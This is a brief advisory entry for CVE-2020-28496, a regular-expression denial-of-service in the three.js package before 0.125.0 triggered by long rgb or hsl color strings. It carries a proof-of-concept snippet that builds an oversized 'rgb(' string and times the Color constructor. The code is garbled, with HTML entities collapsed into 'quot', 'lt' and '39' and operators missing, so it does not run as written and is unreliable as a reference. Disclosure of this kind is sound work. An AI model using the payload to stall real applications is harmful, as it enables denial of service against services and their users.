Three.js Uncontrolled Resource Consumption Vulnerability - CVE-2020-28496

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three require(39three39) function build_blank (n) var ret quotrgb(quot for (var i 0 i lt n i) ret quot quot return ret quotquot var Color three.Color var time Date.now() new Color(build_blank(50000)) var time_cost Date.now() - time console.log(time_costquot msquot)